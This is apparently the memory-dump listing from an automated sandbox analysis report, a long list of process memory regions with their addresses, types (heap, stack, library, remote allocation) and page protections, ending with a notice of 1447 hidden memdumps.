7FFD347E0000
trusted library allocation
page read and write
1D741923000
trusted library allocation
page read and write
DC8FCF9000
stack
page read and write
1D21C335000
heap
page read and write
14F887A7000
heap
page read and write
2A6272E6000
heap
page read and write
2AE77820000
heap
page readonly
7FFD34910000
trusted library allocation
page read and write
9A341FE000
stack
page read and write
2A60D141000
heap
page read and write
2AE775A0000
heap
page read and write
2A60D1C0000
heap
page read and write
2940AD8E000
trusted library allocation
page read and write
C1FB67E000
stack
page read and write
7FFD347C0000
trusted library allocation
page read and write
7FFD347C0000
trusted library allocation
page read and write
7FFD34850000
trusted library allocation
page read and write
1A702066000
heap
page read and write
7FFD34842000
trusted library allocation
page read and write
7FFD34880000
trusted library allocation
page read and write
2940B0A9000
trusted library allocation
page read and write
7FFD345D2000
trusted library allocation
page read and write
C1FB3EE000
stack
page read and write
27402330000
heap
page read and write
7FFD34850000
trusted library allocation
page read and write
7FFD345AD000
trusted library allocation
page execute and read and write
7FFD3467C000
trusted library allocation
page execute and read and write
2A60F0A0000
heap
page read and write
1D21C110000
heap
page execute and read and write
7FFD348D0000
trusted library allocation
page read and write
7FFD345D0000
trusted library allocation
page read and write
1D2046A1000
trusted library allocation
page read and write
14F869E6000
heap
page read and write
7FFD346A6000
trusted library allocation
page execute and read and write
2AE795D0000
heap
page read and write
A60000
heap
page read and write
14F88851000
heap
page read and write
7FFD348C0000
trusted library allocation
page read and write
20B5D794000
heap
page read and write
2940AADE000
trusted library allocation
page read and write
DC8FF77000
stack
page read and write
27402270000
heap
page read and write
7FFD34840000
trusted library allocation
page read and write
294225EE000
heap
page read and write
7FFD347E0000
trusted library allocation
page read and write
29408474000
heap
page read and write
7FFD34840000
trusted library allocation
page read and write
B90000
heap
page read and write
8B0837E000
stack
page read and write
2A6275C0000
heap
page read and write
7FFD348B0000
trusted library allocation
page read and write
D8AD37F000
stack
page read and write
294225BC000
heap
page read and write
2940AE6A000
trusted library allocation
page read and write
7FFD34810000
trusted library allocation
page read and write
9A3463E000
stack
page read and write
1424C92A000
heap
page read and write
7FFD347F0000
trusted library allocation
page read and write
294083F0000
trusted library allocation
page read and write
20B5D954000
heap
page read and write
1D203CCE000
trusted library allocation
page read and write
7FFD348A0000
trusted library allocation
page read and write
1D213F42000
trusted library allocation
page read and write
D8AD47D000
stack
page read and write
1D733335000
trusted library allocation
page read and write
33BE000
stack
page read and write
7FFD347F3000
trusted library allocation
page read and write
7FFD345C4000
trusted library allocation
page read and write
9B206FD000
stack
page read and write
8B083FF000
stack
page read and write
2940A480000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
DC8FD7F000
stack
page read and write
7FFD345D0000
trusted library allocation
page read and write
2A60D1AE000
heap
page read and write
2AE799C0000
heap
page read and write
7FFD34810000
trusted library allocation
page read and write
7F0000
heap
page read and write
14F88A0D000
heap
page read and write
C1FB323000
stack
page read and write
BC0000
heap
page read and write
14F8694C000
heap
page read and write
2940B39E000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
10E277E000
stack
page read and write
2941A341000
trusted library allocation
page read and write
1D2021F4000
heap
page read and write
7FFD34900000
trusted library allocation
page read and write
7FFD348D0000
trusted library allocation
page read and write
1D731E46000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
2940AF86000
trusted library allocation
page read and write
2940B371000
trusted library allocation
page read and write
14F88CC9000
heap
page read and write
7FFD347A2000
trusted library allocation
page read and write
29408260000
heap
page read and write
2941A350000
trusted library allocation
page read and write
7FFD346E0000
trusted library allocation
page execute and read and write
7FFD34830000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page execute and read and write
29FF000
stack
page read and write
20B5FBD9000
trusted library allocation
page read and write
14F88CC0000
heap
page read and write
7FFD348D0000
trusted library allocation
page read and write
1D2054DE000
trusted library allocation
page read and write
10E2C7E000
stack
page read and write
7FFD34762000
trusted library allocation
page read and write
2940AF69000
trusted library allocation
page read and write
DC9027E000
stack
page read and write
1A703FF2000
trusted library allocation
page read and write
20B5D930000
heap
page readonly
1D731CB7000
trusted library allocation
page read and write
2940B03F000
trusted library allocation
page read and write
9A33BF3000
stack
page read and write
A9875A3000
stack
page read and write
9A3417E000
stack
page read and write
A987C77000
stack
page read and write
14F889C0000
heap
page read and write
2B7D000
stack
page read and write
A9875EF000
stack
page read and write
A5E000
stack
page read and write
1D201FF0000
trusted library allocation
page read and write
1D201FB0000
trusted library allocation
page read and write
2AE77580000
heap
page read and write
2AE01E1E000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
2940A8DE000
trusted library allocation
page read and write
2AE775D8000
heap
page read and write
7FFD347A8000
trusted library allocation
page read and write
2942235E000
heap
page read and write
1424E340000
trusted library allocation
page read and write
2A61F311000
trusted library allocation
page read and write
2940A375000
trusted library allocation
page read and write
2A61F2F1000
trusted library allocation
page read and write
27402310000
heap
page read and write
2940843B000
heap
page read and write
8B08576000
stack
page read and write
7FFD34890000
trusted library allocation
page read and write
7FFD34870000
trusted library allocation
page read and write
44B62FF000
stack
page read and write
F5DEC7F000
stack
page read and write
2940A494000
trusted library allocation
page read and write
7FFD345C4000
trusted library allocation
page read and write
1D205A2C000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page read and write
7FFD34900000
trusted library allocation
page read and write
14F887B3000
heap
page read and write
1D731EDC000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
C1FB87E000
stack
page read and write
2AE018EE000
trusted library allocation
page read and write
2AE77860000
heap
page read and write
7FFD3465C000
trusted library allocation
page execute and read and write
7FFD347B0000
trusted library allocation
page read and write
7FFD34830000
trusted library allocation
page read and write
1424EA66000
heap
page read and write
7FFD34788000
trusted library allocation
page read and write
7FFD34860000
trusted library allocation
page read and write
2A60FB77000
trusted library allocation
page read and write
7FFD345D0000
trusted library allocation
page read and write
7FFD348F0000
trusted library allocation
page read and write
C1FB7FE000
stack
page read and write
294085F5000
heap
page read and write
14F887FA000
heap
page read and write
1A71C2D0000
heap
page read and write
7FFD34742000
trusted library allocation
page read and write
F5DECFB000
stack
page read and write
14F88817000
heap
page read and write
20B77728000
heap
page read and write
2AE79699000
heap
page read and write
1A7020A6000
heap
page read and write
9A3453E000
stack
page read and write
7DF4CFD50000
trusted library allocation
page execute and read and write
2AE7973A000
heap
page read and write
14F86927000
heap
page read and write
1D213C71000
trusted library allocation
page read and write
1424EF88000
trusted library allocation
page read and write
B60000
heap
page read and write
20B77910000
heap
page read and write
474000
remote allocation
page execute and read and write
2AE10031000
trusted library allocation
page read and write
2AE77830000
trusted library allocation
page read and write
B40000
heap
page read and write
14F88AC1000
heap
page read and write
DC90D4C000
stack
page read and write
2A6275D2000
heap
page read and write
184B3540000
heap
page read and write
2AE778F0000
heap
page read and write
7FFD34656000
trusted library allocation
page read and write
2C7F000
stack
page read and write
294224F0000
heap
page execute and read and write
7FFD345C2000
trusted library allocation
page read and write
9A33F3E000
stack
page read and write
7FFD345DD000
trusted library allocation
page execute and read and write
2AE79612000
heap
page read and write
2AE775D0000
heap
page read and write
2940A84D000
trusted library allocation
page read and write
20B5F6C1000
trusted library allocation
page read and write
AAE000
stack
page read and write
7FFD345C4000
trusted library allocation
page read and write
27402470000
heap
page read and write
44B60FE000
stack
page read and write
1D749F08000
heap
page read and write
7FFD3478A000
trusted library allocation
page read and write
1D749EC0000
heap
page read and write
7FFD347A2000
trusted library allocation
page read and write
1D7418B1000
trusted library allocation
page read and write
14F86920000
heap
page read and write
8B088FB000
stack
page read and write
7FFD34850000
trusted library allocation
page read and write
1A71C2E0000
heap
page read and write
C1FB3AE000
stack
page read and write
14266C50000
heap
page read and write
20B77900000
heap
page execute and read and write
1424EF76000
trusted library allocation
page read and write
1D731E71000
trusted library allocation
page read and write
7FFD347C0000
trusted library allocation
page read and write
9A346BB000
stack
page read and write
7FFD34760000
trusted library allocation
page execute and read and write
2941A3B2000
trusted library allocation
page read and write
DC8F8A3000
stack
page read and write
2A627350000
heap
page read and write
1D7318B1000
trusted library allocation
page read and write
14F869E6000
heap
page read and write
20B77752000
heap
page read and write
2940AEFB000
trusted library allocation
page read and write
2A3C000
stack
page read and write
1424EFBE000
trusted library allocation
page read and write
2AE795F2000
heap
page read and write
2A61F299000
trusted library allocation
page read and write
1A702220000
trusted library allocation
page read and write
7FFD34650000
trusted library allocation
page read and write
8B07FEE000
stack
page read and write
7FFD34810000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
20B77784000
heap
page read and write
7FFD349D0000
trusted library allocation
page read and write
1D21C427000
heap
page read and write
14F88827000
heap
page read and write
A987B7E000
stack
page read and write
F5DEA78000
stack
page read and write
7FFD348F0000
trusted library allocation
page read and write
2940AEEA000
trusted library allocation
page read and write
1D204C54000
trusted library allocation
page read and write
14F889F1000
heap
page read and write
1A703D80000
heap
page execute and read and write
2940AFD8000
trusted library allocation
page read and write
1D203BEC000
heap
page read and write
14F88A28000
heap
page read and write
7FFD3467C000
trusted library allocation
page execute and read and write
1D72FB8C000
heap
page read and write
1D203B20000
heap
page read and write
7FFD349F0000
trusted library allocation
page read and write
7FFD34686000
trusted library allocation
page read and write
14F88A23000
heap
page read and write
7FFD34950000
trusted library allocation
page read and write
1A703D14000
heap
page read and write
1D21C2E0000
heap
page read and write
1A701FA0000
heap
page read and write
20B5D773000
heap
page read and write
2940AF82000
trusted library allocation
page read and write
1D731AD3000
trusted library allocation
page read and write
2AE796D7000
heap
page execute and read and write
7FFD348B0000
trusted library allocation
page read and write
1D73304A000
trusted library allocation
page read and write
1D204C80000
trusted library allocation
page read and write
DC90078000
stack
page read and write
27402315000
heap
page read and write
FC0000
heap
page read and write
8B07EA3000
stack
page read and write
7FFD348C0000
trusted library allocation
page read and write
7FFD34686000
trusted library allocation
page execute and read and write
2A627556000
heap
page execute and read and write
2940AE6F000
trusted library allocation
page read and write
A988BCE000
stack
page read and write
27402314000
heap
page read and write
1D72FB84000
heap
page read and write
78C000
stack
page read and write
1424EB5F000
trusted library allocation
page read and write
2A60F72A000
trusted library allocation
page read and write
29408460000
heap
page read and write
2940AF49000
trusted library allocation
page read and write
184B3520000
heap
page read and write
7FFD34850000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page execute and read and write
1D72FB82000
heap
page read and write
1D72FD44000
heap
page read and write
2AE775E2000
heap
page read and write
7FFD347D0000
trusted library allocation
page read and write
1D21C100000
trusted library allocation
page read and write
1D205541000
trusted library allocation
page read and write
8B092CE000
stack
page read and write
A987BF8000
stack
page read and write
1D21C42E000
heap
page read and write
7FFD345D0000
trusted library allocation
page read and write
7FFD345FC000
trusted library allocation
page execute and read and write
7FFD3493C000
trusted library allocation
page read and write
7FFD348F0000
trusted library allocation
page execute and read and write
29422580000
heap
page read and write
1D204D70000
trusted library allocation
page read and write
1A7022E0000
heap
page read and write
2940A3ED000
trusted library allocation
page read and write
DA0000
heap
page read and write
20B5F234000
heap
page read and write
1424C810000
heap
page read and write
1A70562D000
trusted library allocation
page read and write
10E2D7F000
stack
page read and write
2940A330000
heap
page read and write
14266C54000
heap
page read and write
10E267F000
stack
page read and write
7FFD3467C000
trusted library allocation
page execute and read and write
2940AF55000
trusted library allocation
page read and write
1D205A76000
trusted library allocation
page read and write
20B5FB58000
trusted library allocation
page read and write
A987F7F000
stack
page read and write
1D213F4B000
trusted library allocation
page read and write
7FFD34770000
trusted library allocation
page execute and read and write
1A701FC0000
heap
page read and write
1D203B68000
heap
page read and write
7FFD345A4000
trusted library allocation
page read and write
F5DEBFE000
stack
page read and write
2A60ECA0000
trusted library allocation
page read and write
14F88A07000
heap
page read and write
1424C890000
heap
page read and write
14F889D3000
heap
page read and write
8B0877F000
stack
page read and write
7FFD34860000
trusted library allocation
page read and write
1D203E72000
trusted library allocation
page read and write
7FFD347F0000
trusted library allocation
page read and write
7FFD34A16000
trusted library allocation
page read and write
1D203B4E000
heap
page read and write
7FFD34800000
trusted library allocation
page read and write
1D7333B9000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
2940AFA8000
trusted library allocation
page read and write
1425ED01000
trusted library allocation
page read and write
B90000
heap
page read and write
9A33E7E000
stack
page read and write
7FFD3477A000
trusted library allocation
page read and write
1D741EF5000
trusted library allocation
page read and write
7FFD345C4000
trusted library allocation
page read and write
1D72FB68000
heap
page read and write
BA0000
heap
page read and write
2940ADBA000
trusted library allocation
page read and write
2A60F790000
trusted library allocation
page read and write
DC8FFFC000
stack
page read and write
14F86C50000
heap
page read and write
2A60F9AD000
trusted library allocation
page read and write
20B5F130000
trusted library allocation
page read and write
2940AE02000
trusted library allocation
page read and write
2AE102F4000
trusted library allocation
page read and write
471000
remote allocation
page execute and read and write
7FFD34782000
trusted library allocation
page read and write
1D72FAE0000
heap
page read and write
7FFD34686000
trusted library allocation
page execute and read and write
F5DE2A2000
stack
page read and write
1D72FB20000
heap
page read and write
1D213F5B000
trusted library allocation
page read and write
2940AFF0000
trusted library allocation
page read and write
7FFD34A00000
trusted library allocation
page read and write
2940AE65000
trusted library allocation
page read and write
7FFD347A2000
trusted library allocation
page read and write
C1FC74E000
stack
page read and write
1D202089000
heap
page read and write
7FFD348B0000
trusted library allocation
page read and write
C1FBD7B000
stack
page read and write
1D72FBA0000
heap
page read and write
7FFD348A0000
trusted library allocation
page read and write
1424EF70000
trusted library allocation
page read and write
14F86CA0000
heap
page read and write
2AE01E23000
trusted library allocation
page read and write
7FFD348B0000
trusted library allocation
page read and write
2A60EC70000
trusted library allocation
page read and write
1D21C43E000
heap
page read and write
2A60D410000
heap
page read and write
2940AEC9000
trusted library allocation
page read and write
1D72FD20000
trusted library allocation
page read and write
14F86A11000
heap
page read and write
20B5FB52000
trusted library allocation
page read and write
2940AF7A000
trusted library allocation
page read and write
7FFD34751000
trusted library allocation
page read and write
14F889CB000
heap
page read and write
7FFD347A0000
trusted library allocation
page execute and read and write
7FFD345CD000
trusted library allocation
page execute and read and write
1A71C2F6000
heap
page read and write
2940B019000
trusted library allocation
page read and write
1D205A51000
trusted library allocation
page read and write
1D73302E000
trusted library allocation
page read and write
20B5D6D8000
heap
page read and write
7FFD3477A000
trusted library allocation
page read and write
7FFD34840000
trusted library allocation
page read and write
7FFD34784000
trusted library allocation
page read and write
7FFD34762000
trusted library allocation
page read and write
7FFD349F0000
trusted library allocation
page execute and read and write
1A703BC6000
heap
page execute and read and write
7FFD34656000
trusted library allocation
page read and write
20B6F734000
trusted library allocation
page read and write
2A6272BE000
heap
page read and write
7FFD34860000
trusted library allocation
page read and write
2940AFEC000
trusted library allocation
page read and write
7FFD3477A000
trusted library allocation
page read and write
7FFD347C0000
trusted library allocation
page execute and read and write
8B086FE000
stack
page read and write
F5DE7FF000
stack
page read and write
14F88CC9000
heap
page read and write
1D202084000
heap
page read and write
2AE799BA000
heap
page read and write
7FFD34762000
trusted library allocation
page read and write
7FFD34870000
trusted library allocation
page read and write
2A60D16A000
heap
page read and write
7FFD348E0000
trusted library allocation
page read and write
1D203BC8000
heap
page read and write
2940A761000
trusted library allocation
page read and write
7FFD34820000
trusted library allocation
page read and write
1D7333AE000
trusted library allocation
page read and write
1D72FCD0000
trusted library allocation
page read and write
5AF8FD000
stack
page read and write
14F889D6000
heap
page read and write
2940AFEE000
trusted library allocation
page read and write
7FFD348C0000
trusted library allocation
page read and write
10E388D000
stack
page read and write
F5DEAFC000
stack
page read and write
7FFD348F0000
trusted library allocation
page read and write
2A61F271000
trusted library allocation
page read and write
2940B36A000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page execute and read and write
2940AEEC000
trusted library allocation
page read and write
D8AD4FE000
stack
page read and write
1D201FD0000
trusted library allocation
page read and write
2AE01303000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page read and write
7FFD345AD000
trusted library allocation
page execute and read and write
7FFD34771000
trusted library allocation
page read and write
7FFD34770000
trusted library allocation
page read and write
2A60D162000
heap
page read and write
1D7314FF000
heap
page read and write
2940845C000
heap
page read and write
1D749F3C000
heap
page read and write
2940AF95000
trusted library allocation
page read and write
DC8F9AF000
stack
page read and write
2AE00F64000
trusted library allocation
page read and write
7FFD348E0000
trusted library allocation
page read and write
2940A49A000
trusted library allocation
page read and write
2AE7760B000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
7FFD34850000
trusted library allocation
page read and write
8B0827E000
stack
page read and write
2940AFCD000
trusted library allocation
page read and write
2940AFD4000
trusted library allocation
page read and write
1D201FE0000
heap
page readonly
2AE10001000
trusted library allocation
page read and write
DC8FDF7000
stack
page read and write
2940AC0A000
trusted library allocation
page read and write
BD0000
heap
page read and write
1D7317D7000
heap
page read and write
14F88A4E000
heap
page read and write
7FFD34781000
trusted library allocation
page read and write
8B07FAF000
stack
page read and write
14F889F8000
heap
page read and write
7FFD34903000
trusted library allocation
page read and write
14F889C4000
heap
page read and write
2940AE7D000
trusted library allocation
page read and write
1D204D0E000
trusted library allocation
page read and write
DC8F9EE000
stack
page read and write
7FFD349DC000
trusted library allocation
page read and write
1424C8E1000
heap
page read and write
1A702250000
heap
page readonly
1D21C313000
heap
page read and write
327E000
stack
page read and write
7FFD348E0000
trusted library allocation
page read and write
1D20203D000
heap
page read and write
7FFD348C0000
trusted library allocation
page read and write
14F88A28000
heap
page read and write
10E2DFB000
stack
page read and write
1D733032000
trusted library allocation
page read and write
1424C898000
heap
page read and write
2940AF84000
trusted library allocation
page read and write
7FFD34900000
trusted library allocation
page read and write
2940A6A8000
trusted library allocation
page read and write
1D741ADE000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page execute and read and write
2940AEC0000
trusted library allocation
page read and write
DB0000
heap
page read and write
2AE796D0000
heap
page execute and read and write
7FFD348B0000
trusted library allocation
page read and write
14F889C7000
heap
page read and write
20B5D6B0000
heap
page read and write
14F86931000
heap
page read and write
1D731E6F000
trusted library allocation
page read and write
7FFD34870000
trusted library allocation
page read and write
7FFD34771000
trusted library allocation
page read and write
7FFD34762000
trusted library allocation
page read and write
D8AD3FE000
stack
page read and write
2AE00F6A000
trusted library allocation
page read and write
7FFD348B0000
trusted library allocation
page read and write
7FFD347E0000
trusted library allocation
page read and write
C1FBB7E000
stack
page read and write
1D73305A000
trusted library allocation
page read and write
20B6F6C1000
trusted library allocation
page read and write
20B5D77C000
heap
page read and write
14F88A28000
heap
page read and write
2940B017000
trusted library allocation
page read and write
7FFD347D0000
trusted library allocation
page read and write
CC0000
heap
page read and write
F5DE9FC000
stack
page read and write
2940AE7B000
trusted library allocation
page read and write
2AE004CE000
trusted library allocation
page read and write
1D72FBE4000
heap
page read and write
1D20559F000
trusted library allocation
page read and write
7FFD34A40000
trusted library allocation
page read and write
7FFD346F0000
trusted library allocation
page execute and read and write
1D733346000
trusted library allocation
page read and write
1A702290000
trusted library allocation
page read and write
2AE01865000
trusted library allocation
page read and write
7FFD345C3000
trusted library allocation
page execute and read and write
1D21C391000
heap
page read and write
14F88827000
heap
page read and write
A98787E000
unkown
page read and write
2AE79730000
heap
page read and write
2940B3A0000
trusted library allocation
page read and write
20B5F941000
trusted library allocation
page read and write
294224F7000
heap
page execute and read and write
7FFD345BB000
trusted library allocation
page read and write
20B5FB6A000
trusted library allocation
page read and write
2940AE3E000
trusted library allocation
page read and write
1D2049C1000
trusted library allocation
page read and write
1424C989000
heap
page read and write
DC90ECE000
stack
page read and write
7FFD34676000
trusted library allocation
page read and write
2AE795E7000
heap
page read and write
5DC000
stack
page read and write
2AE00001000
trusted library allocation
page read and write
2A60F798000
trusted library allocation
page read and write
7FFD347A0000
trusted library allocation
page read and write
1D749EED000
heap
page read and write
2940ABF6000
trusted library allocation
page read and write
1D205A71000
trusted library allocation
page read and write
20B6F740000
trusted library allocation
page read and write
7FFD348B0000
trusted library allocation
page read and write
10E27FD000
stack
page read and write
184B3510000
heap
page read and write
DC900FE000
stack
page read and write
1D21C117000
heap
page execute and read and write
1424F1F9000
trusted library allocation
page read and write
1424E970000
heap
page read and write
27BE000
stack
page read and write
7FFD345C3000
trusted library allocation
page execute and read and write
184B35CA000
heap
page read and write
7FFD345BB000
trusted library allocation
page read and write
7FFD348E2000
trusted library allocation
page read and write
A987E7E000
stack
page read and write
F5DE32F000
stack
page read and write
7FFD349C0000
trusted library allocation
page read and write
2940AF6D000
trusted library allocation
page read and write
2A60D2A0000
heap
page read and write
1D731CBF000
trusted library allocation
page read and write
2940AF99000
trusted library allocation
page read and write
14F889F9000
heap
page read and write
294223FE000
heap
page read and write
14F889C6000
heap
page read and write
7FFD34670000
trusted library allocation
page read and write
7FFD345C4000
trusted library allocation
page read and write
7FFD34960000
trusted library allocation
page read and write
2AE0188B000
trusted library allocation
page read and write
1424E4B0000
heap
page execute and read and write
7FFD347E0000
trusted library allocation
page read and write
2AE79B30000
heap
page read and write
14F88D5C000
heap
page read and write
14F88C16000
heap
page read and write
14F88CC1000
heap
page read and write
7FFD347D0000
trusted library allocation
page read and write
29408530000
trusted library allocation
page read and write
2AE01031000
trusted library allocation
page read and write
20B5FB78000
trusted library allocation
page read and write
C1FB9F7000
stack
page read and write
7FFD3465C000
trusted library allocation
page execute and read and write
2AE778A0000
trusted library allocation
page read and write
2AE77900000
heap
page read and write
A98797E000
stack
page read and write
8B0887E000
stack
page read and write
1D749C10000
heap
page read and write
2A627587000
heap
page read and write
2AE79A70000
trusted library allocation
page read and write
7FFD34676000
trusted library allocation
page read and write
14F8888A000
heap
page read and write
2940AF33000
trusted library allocation
page read and write
A9878FE000
stack
page read and write
184B3585000
heap
page read and write
2A61F281000
trusted library allocation
page read and write
1424F031000
trusted library allocation
page read and write
7FFD34780000
trusted library allocation
page execute and read and write
294084A3000
heap
page read and write
2AE0111F000
trusted library allocation
page read and write
44B68FB000
stack
page read and write
2AE7762B000
heap
page read and write
7FFD346A6000
trusted library allocation
page execute and read and write
2AE7760F000
heap
page read and write
2AE7988E000
heap
page read and write
14F889F9000
heap
page read and write
2AE00DE0000
trusted library allocation
page read and write
AFC000
stack
page read and write
1424C943000
heap
page read and write
27402344000
heap
page read and write
44B5EFA000
stack
page read and write
2B3F000
stack
page read and write
2940A3C0000
trusted library allocation
page read and write
1D72FAC0000
heap
page read and write
2AE798B9000
heap
page read and write
2940A483000
trusted library allocation
page read and write
A988ACC000
stack
page read and write
7FFD348D0000
trusted library allocation
page read and write
1D731EF6000
trusted library allocation
page read and write
F5DF70E000
stack
page read and write
7FFD348D3000
trusted library allocation
page read and write
184B3580000
heap
page read and write
1425EB54000
trusted library allocation
page read and write
14F889E0000
heap
page read and write
2940AF2F000
trusted library allocation
page read and write
2AE79170000
heap
page execute and read and write
2940AED2000
trusted library allocation
page read and write
7FFD348D0000
trusted library allocation
page read and write
7FFD347C0000
trusted library allocation
page read and write
2AE799AF000
heap
page read and write
7FFD34810000
trusted library allocation
page read and write
C1FBCFE000
stack
page read and write
7FFD34900000
trusted library allocation
page read and write
1D203BC0000
heap
page read and write
2AE010BC000
trusted library allocation
page read and write
9B208FF000
stack
page read and write
20B6F941000
trusted library allocation
page read and write
D8AE50D000
stack
page read and write
20B5FB7C000
trusted library allocation
page read and write
294225B2000
heap
page read and write
20B5D950000
heap
page read and write
2AE795DC000
heap
page read and write
7FFD348F0000
trusted library allocation
page read and write
F5DF78D000
stack
page read and write
1D731E97000
trusted library allocation
page read and write
7FFD34840000
trusted library allocation
page read and write
1D72FB80000
heap
page read and write
1A703BC0000
heap
page execute and read and write
7FFD34880000
trusted library allocation
page read and write
1A71C190000
heap
page read and write
7FFD34676000
trusted library allocation
page read and write
7FFD347A5000
trusted library allocation
page read and write
2A60D415000
heap
page read and write
1D21C405000
heap
page read and write
7FFD347E0000
trusted library allocation
page read and write
20B77907000
heap
page execute and read and write
1A713F77000
trusted library allocation
page read and write
29408510000
trusted library allocation
page read and write
7FFD34800000
trusted library allocation
page read and write
20B5D77A000
heap
page read and write
14F88859000
heap
page read and write
2AE799A1000
heap
page read and write
20B5F690000
heap
page execute and read and write
2940AFE5000
trusted library allocation
page read and write
C1FB979000
stack
page read and write
2940AD4F000
trusted library allocation
page read and write
7FFD34900000
trusted library allocation
page read and write
29409DA0000
heap
page read and write
2AE79710000
heap
page read and write
2A60ECE0000
heap
page read and write
2940B010000
trusted library allocation
page read and write
D8AD778000
stack
page read and write
2A60FD74000
trusted library allocation
page read and write
2A6272F2000
heap
page read and write
7FFD347E0000
trusted library allocation
page read and write
1D204DAB000
trusted library allocation
page read and write
1A7022E4000
heap
page read and write
2AE1045A000
trusted library allocation
page read and write
2AE77654000
heap
page read and write
7FFD349B0000
trusted library allocation
page read and write
34BF000
stack
page read and write
8B084F8000
stack
page read and write
DC8FEF9000
stack
page read and write
1424E350000
heap
page read and write
2AE77570000
heap
page read and write
7FFD346E0000
trusted library allocation
page execute and read and write
1424C963000
heap
page read and write
2940AFE3000
trusted library allocation
page read and write
1D204F54000
trusted library allocation
page read and write
D8AD87C000
stack
page read and write
7FFD34772000
trusted library allocation
page read and write
7FFD34790000
trusted library allocation
page execute and read and write
7FFD347F0000
trusted library allocation
page read and write
1424CB00000
heap
page read and write
2940A895000
trusted library allocation
page read and write
7FFD345C3000
trusted library allocation
page execute and read and write
20B5D7BC000
heap
page read and write
7FFD346E0000
trusted library allocation
page execute and read and write
184B37C0000
heap
page read and write
1424EFFE000
trusted library allocation
page read and write
2A60D101000
heap
page read and write
5AF9FF000
unkown
page read and write
1424E4B7000
heap
page execute and read and write
1A713DD0000
trusted library allocation
page read and write
7FFD349C0000
trusted library allocation
page read and write
20B5D630000
heap
page read and write
F5DE87F000
stack
page read and write
1D72FCA0000
trusted library allocation
page read and write
1D203AC4000
heap
page read and write
7FFD34850000
trusted library allocation
page read and write
2A60F706000
trusted library allocation
page read and write
14266C6C000
heap
page read and write
7FFD345EB000
trusted library allocation
page read and write
1D2053D2000
trusted library allocation
page read and write
7FFD34771000
trusted library allocation
page read and write
7FFD347B0000
trusted library allocation
page execute and read and write
1424E310000
trusted library allocation
page read and write
10E2A7A000
stack
page read and write
2A60FD7A000
trusted library allocation
page read and write
D8AD97E000
stack
page read and write
7FFD34771000
trusted library allocation
page read and write
7FFD347A2000
trusted library allocation
page read and write
D8ACFDE000
stack
page read and write
1A7059FB000
trusted library allocation
page read and write
7FFD34993000
trusted library allocation
page read and write
7FFD34900000
trusted library allocation
page read and write
1424C94D000
heap
page read and write
2AE7987F000
heap
page read and write
2AE011D5000
trusted library allocation
page read and write
2A60ECE5000
heap
page read and write
1D732FDC000
trusted library allocation
page read and write
1A702014000
heap
page read and write
7FFD348C0000
trusted library allocation
page read and write
2AE79900000
heap
page read and write
7FFD34890000
trusted library allocation
page read and write
2940A7A0000
trusted library allocation
page read and write
2A60D0B0000
heap
page read and write
20B5FDC8000
trusted library allocation
page read and write
There are 1447 hidden memdumps, click here to show them.